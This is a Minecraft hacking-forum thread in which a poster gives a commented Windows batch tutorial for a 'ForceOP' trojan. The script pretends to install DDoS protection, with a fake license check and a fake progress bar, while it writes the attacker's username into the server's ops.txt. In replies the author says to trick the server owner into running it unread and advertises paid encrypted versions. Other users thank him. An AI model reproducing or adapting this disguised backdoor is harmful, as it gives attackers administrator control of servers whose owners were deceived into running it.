Page 1 of 2 12 LastLast
Results 1 to 15 of 23
  1. #1
    IWillNeverUnderstand's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    472
    Reputation
    136
    Thanks
    1,234
    My Mood
    Cheeky

    Get OP on ANY SERVER [Batch] [easy] [ForceOP]

    This is a simple and easy program. You can edit it yourself. This is REAL simple....
    If you like this idea you can buy an extended and fully encrypted working version here for 3$: https://www.mpgh.net/forum/735-minecr...encrypted.html




    DO NOT COPY AND PASTE EVERYTHING.
    PLEASE DOWNLOAD (and thank) THE PROGRAM AT THE BOTTOM OF THE PAGE.
    THAT WILL NOT CONTAIN THE COMMENTS.



    how the program works: adds your username to the OPS.txt so no.. this is no virus or fake..
    it's just real obvious.

    This is a tutorial so i'm going to tell you how it works.

    first: Start by declaring a title for your batch program.
    as well as defining f. We will need that later


    Code:
    @echo off
    color 0f
    :: color 0f means black background with white text.
    Title minecraft server with basic ddos protection
    :: define the title
    set f=ek3

    This defines the basics we need. Now we will add a little section so we make sure the ops.txt exists.
    But using ops.txt as a file isn't smart. that's why we use bukkit.yml instead.


    Code:
    if exist bukkit.yml goto register
    :: this checks if bukkit.yml is in the folder. If not it will go to the next line. If so it will go to ":register"
    
    echo Files have not been created yet.
    echo launch the server normally and then close it
    echo then launch this program again
    :: everything with echo in front here. Means TEXT this will display on the screen.
    pause >nul
    :: pause means the program will pause and not go on untill a button is pressed. >nul hides the message that comes with it.
    exit
    :: this will exit the program

    what we just did was: we made the program check for bukkit.yml. It was not found so it displays: run the server, let it create the files and then close it again.
    Now we will go to the :register. Here we will add ourselves to the ops.txt

    Not only that. We will add a simple password. This is so simple that if the guy pressed EDIT he will see the code..


    Code:
    :register
    cls
    :: cls clears the screen (CLear Screen)
    set d=ddos
    echo niels1189>>ops.txt
    :: this adds your name to the OPS
    set code=ased%f%%d%
    :: code is set
    set /p question=Please enter the license code:
    :: asks for the license code. In this case it is: asedek3ddos
    if %question% == asedek3ddos goto cr
    goto register

    echo well the.... I mean: well, that was that. Now we will quickly add an installing part to make it look a bit more realistic.
    then again this isn't what you call the best coding ever :P
    check the top of the page to buy a better code.
    we will now add the last part


    Code:
    :cr
    cls
    :: clear screen
    echo Correct code.
    echo press a button to continue.
    pause >nul
    
    cls
    echo Installing...
    echo please wait
    ping localhost -n 3 >nul
    :: causes a time delay
    :: we will now add a installing progress.. (real fast)
    set perc=0
    :: percentage
    :loopss
    if perc == 100 goto dones
    
    echo %perc%%
    set /a perc=%perc% + 1
    ping localhost -n 1 >nul
    goto loopss
    :: loops around 100x with a small delay.
    :dones
    cls
    echo done installing.
    echo you can run the server normally now.
    pause >nul
    exit
    And there you go. Again. This code is not optimized and i just made it quickly so people could learn a bit more batch as well as
    maybe get OP on a few servers.

    This works on any server but it's real easy to figure out.





    This is a simple and easy program. You can edit it yourself. This is REAL simple....
    If you like this idea you can buy an extended and fully encrypted working version here for 3$: https://www.mpgh.net/forum/735-minecr...encrypted.html



    https://www.virustotal.com/en/file/2...is/1377805376/
    https://virusscan.jotti.org/en/scanre...cea355f24d5335

    <b>Downloadable Files</b> Downloadable Files
    Last edited by Hero; 08-29-2013 at 01:36 PM.

  2. The Following 120 Users Say Thank You to IWillNeverUnderstand For This Useful Post:

    >:C Test (09-07-2019),1057 (04-30-2022),a11br0wn (12-13-2013),ABTyruf (04-01-2021),airfisher (07-09-2019),asdfgqqw (12-31-2018),AVIININ (05-01-2014),baconatorman (07-09-2020),bennydgamer (09-04-2023),cacapipipupu (06-16-2014),cedver (05-30-2023),ChaoticSpiders (01-22-2014),ChronicFuse (01-30-2014),Creeper360bill (06-08-2014),Crypto4857 (11-11-2013),csumbillo (06-18-2014),DamonFTiger (05-29-2019),darkkestkniiight (08-22-2019),darkposeiden (01-24-2014),deadliff (06-07-2014),DemonTheDark (11-05-2022),Destroyers007 (07-17-2021),diablo011 (07-25-2022),EAR%HGEAH5ehehteth (01-23-2014),Edfgf4 (01-24-2014),EmberSides (05-24-2020),F3st1v3123 (09-08-2019),Fishy_Time (06-24-2023),gainb (04-22-2014),GhostRage10 (11-06-2013),gonkes (09-03-2020),Guili xD (08-31-2017),habbstar (05-10-2014),hamod200965 (11-09-2013),Haycommerce (03-19-2021),Heogg (01-27-2014),HeyBros0036 (03-23-2014),HHAAH (02-15-2023),hinlockgrocorr (11-19-2013),hiwheel (11-09-2013),hurb_ (12-23-2021),IamJoffo (04-08-2014),imathing (09-22-2019),Incid (01-18-2014),iskamag (07-22-2019),itamark100 (08-10-2021),ivan_dc (10-28-2013),jerry43002 (02-28-2014),jesus464 (01-14-2014),jk1087 (05-10-2014),johnson70 (01-22-2014),keila2453 (02-10-2024),King174 (11-10-2013),Konarn (01-26-2014),koolkidpaorter (03-09-2019),krn888 (01-23-2014),lolless (01-23-2014),LolMemKiller (07-20-2022),lololo0 (03-14-2014),loop98 (11-24-2013),lsutigers527 (02-16-2014),luke60419 (06-01-2014),madgunna7498 (07-07-2014),MarsRaps23 (01-24-2014),maskjoker (09-01-2014),mATT1321321321 (11-25-2020),megaman1321 (03-30-2014),METRIODIK (01-27-2014),MilanDahKat (09-27-2017),mochaaa (09-03-2023),muradnemri99 (07-06-2014),naminu (06-11-2014),nevachana (11-13-2013),nikjen12 (12-10-2013),NTGHAX (12-31-2013),nyafish (11-24-2013),omarrizk123456 (09-03-2014),OncePhoenix (04-11-2014),ooglio (07-14-2014),Osmerstom (06-23-2023),Palden150 (04-22-2019),PhantomBoyYT (07-01-2019),pierce555 (03-19-2014),pill62 (02-15-2014),PoconoMan (02-15-2014),proto5563ss (08-23-2021),qq66292432 (07-22-2018),r0cHi1c (03-03-2014),ronanvdv1 (02-17-2014),rustymonster2000 (01-25-2014),S0m3on3 (02-01-2024),saharud (10-23-2013),samrat_op (07-29-2023),samzab (03-28-2014),satyamedh (10-11-2019),ShadowWolfSpam (11-27-2013),shahz12 (12-04-2013),shayade (06-02-2019),skeethyeth (08-01-2019),Slappy02 (09-28-2022),SniperV789 (01-24-2014),soheal1 (10-16-2023),Squarebb (09-27-2023),TheDemonsCrown (11-27-2022),thehalokey2 (12-08-2019),toni12345 (02-28-2014),TrygveBlock (04-02-2023),Uberfuhrer (11-02-2013),unitedmelonpvp (08-25-2014),USERnameTHATdoesnotexist (07-08-2023),whameqn (02-23-2019),will123123321123490999876 (08-22-2020),wise guy 123 (06-08-2021),Xanoxis12345 (01-25-2014),Xenobing (01-23-2014),xXSkyNubXx (11-24-2013),Y_NICK_Y (12-26-2013),zencifarki (07-18-2014),zeyad504 (02-05-2014),ZusCoo (01-23-2014)

  3. #2
    Domokun_index's Avatar
    Join Date
    Mar 2013
    Gender
    male
    Posts
    1,955
    Reputation
    336
    Thanks
    1,265
    I would thanks, but I can't.
    Anyhow, fantastic guide ^ ^

  4. #3
    IWillNeverUnderstand's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    472
    Reputation
    136
    Thanks
    1,234
    My Mood
    Cheeky
    Quote Originally Posted by Domokun_index View Post
    I would thanks, but I can't.
    Anyhow, fantastic guide ^ ^
    You can do thanks and download. That button is still there. Once it gets accepted of course

  5. #4
    Lonesome Cowboy's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Location
    https://www.mpgh.net Posts: 12,475
    Posts
    5,379
    Reputation
    748
    Thanks
    1,423
    My Mood
    Brooding
    Virus scans
    Minecraft Wiki Manager since: 2012.12.16.
    Games Wiki Manager since: 2012.12.16
    Minecraft Section Minion: 2013.05.04.-2014.05.04
    League of Legends Section Minion: 2013.05.04.-2014.05.04
    Need for Speed World Minion: 2013.07.23.-2014.05.04
    Steam Games Section Minion: 2013.08.05.
    -2014.05.04
    Warrock Section Minion: 2013.10.09.
    -2014.05.04

    If you would like to become a Minecraft Wiki Editor, apply here!
    If you would like to become a Games Wiki Editor, PM me!

    Gifts:
    Gyongytyuk,Gyongytyuk,Zaps

  6. #5
    Hero's Avatar
    Join Date
    Feb 2011
    Gender
    male
    Location
    memes
    Posts
    40,134
    Reputation
    4764
    Thanks
    9,674
    Just threw in virus scans. Not tested. Use at your own risk.
    [] [] [] [][]

    Editor from 06•14•2011 • 2014
    Donator since 09•16•2011
    Minion from 10•10•2011 • 01•06•2011
    Minion+ from 01•06•2012 • 08•08•2012
    Moderator from 08•08•2012 • 10•06•2012
    Global Moderator from 10•06•2012 • 12•05•2017
    Staff Administrator from 12•05•2017 • 05•01•2019
    Trusted Member since 07•13•2019
    Global Moderator since 09•11•2020




  7. #6
    IWillNeverUnderstand's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    472
    Reputation
    136
    Thanks
    1,234
    My Mood
    Cheeky
    it's a .bat file. It's a txt file renamed to .bat.
    It officially don't need a virus scan since it's a txt file and you can edit it when you want.

    It only contains the code mentioned above.
    It's only zipped because I can't upload .bat files. (not supported)

  8. #7
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by Hero View Post
    Just threw in virus scans. Not tested. Use at your own risk.
    You always make it sound as if everything is going to install a RAT, backdoor, or other harmful things. However, I see that may probably just be part of the job too.


    OT: It would be more convincing to server owners if you used a GUI program. Plus, its just a tiny bit harder to find sources to those programs (jar / visual basic compiled exe files, etc.)
    Last edited by LordPankake; 08-29-2013 at 04:41 PM.

  9. #8
    Hero's Avatar
    Join Date
    Feb 2011
    Gender
    male
    Location
    memes
    Posts
    40,134
    Reputation
    4764
    Thanks
    9,674
    Quote Originally Posted by LordPankake View Post
    You always make it sound as if everything is going to install a RAT, backdoor, or other harmful things. However, I see that may probably just be part of the job too.


    OT: It would be more convincing to server owners if you used a GUI program. Plus, its just a tiny bit harder to find sources to those programs (jar / visual basic compiled exe files, etc.)
    Haha, someone said that same thing a few weeks back too. It's not supposed to sound like that. I got used to saying "use at your own risk" in threads where hacks can get detected/patched and that people should use it at their own caution. I check stuff too if they're clean and some times run them in VMWare if I feel there's an issue with it.
    [] [] [] [][]

    Editor from 06•14•2011 • 2014
    Donator since 09•16•2011
    Minion from 10•10•2011 • 01•06•2011
    Minion+ from 01•06•2012 • 08•08•2012
    Moderator from 08•08•2012 • 10•06•2012
    Global Moderator from 10•06•2012 • 12•05•2017
    Staff Administrator from 12•05•2017 • 05•01•2019
    Trusted Member since 07•13•2019
    Global Moderator since 09•11•2020




  10. #9
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by Hero View Post


    Haha, someone said that same thing a few weeks back too. It's not supposed to sound like that. I got used to saying "use at your own risk" in threads where hacks can get detected/patched and that people should use it at their own caution. I check stuff too if they're clean and some times run them in VMWare if I feel there's an issue with it.
    I've noticed most of the moderators+ do that. The local minions however always have a more positive connotation.

  11. #10
    133spider's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    387
    Reputation
    23
    Thanks
    6,049
    My Mood
    Tired
    This is the exact same thing I put on my thread... https://www.mpgh.net/forum/421-minecr...ft-server.html

    Btw @Woods or someone else can move my thread to tutorials section?
    Last edited by 133spider; 08-29-2013 at 10:14 PM.

  12. #11
    IWillNeverUnderstand's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    472
    Reputation
    136
    Thanks
    1,234
    My Mood
    Cheeky
    same thing: My tutorial is better explained and I actually put a bit of time into this.

  13. #12
    IamIshkabibble's Avatar
    Join Date
    Aug 2013
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    0
    Can someone please tell me how I would use this/how the owner would see this and under what circumstances it would work? Sorry, I'm new here.

  14. #13
    IWillNeverUnderstand's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    472
    Reputation
    136
    Thanks
    1,234
    My Mood
    Cheeky
    Quote Originally Posted by IamIshkabibble View Post
    Can someone please tell me how I would use this/how the owner would see this and under what circumstances it would work? Sorry, I'm new here.
    If you seriously want to try to hack a server with his I suggest you buy my encrypted versions. ranging from 1-10$
    But this program is still real easy to use. just put your name instead of niels1189. Then your name will be added to the ops.txt.
    Only thing you need to do after that is: Make the owner run the file without him opening it and looking through the code.
    If he does and he finds out, you are sure to be banned.

  15. #14
    lazo95's Avatar
    Join Date
    Jan 2011
    Gender
    male
    Location
    dasdasd
    Posts
    16
    Reputation
    10
    Thanks
    0
    Wow it's very well explaned

  16. #15
    mrspencerrecor's Avatar
    Join Date
    Aug 2013
    Gender
    male
    Location
    US
    Posts
    7
    Reputation
    10
    Thanks
    1
    My Mood
    Bored
    any way you could make a tutorial on youtube, ive never created a batch /dont know how to use it :/

Page 1 of 2 12 LastLast

Similar Threads

  1. [Release] Mau5Villa Easy Rank FreeBuild { MineCraft Classic Server }
    By boblime in forum Minecraft Server Advertising
    Replies: 2
    Last Post: 07-25-2011, 10:43 AM
  2. Batch
    By Shark23 in forum Suggestions, Requests & General Help
    Replies: 0
    Last Post: 07-16-2010, 02:30 PM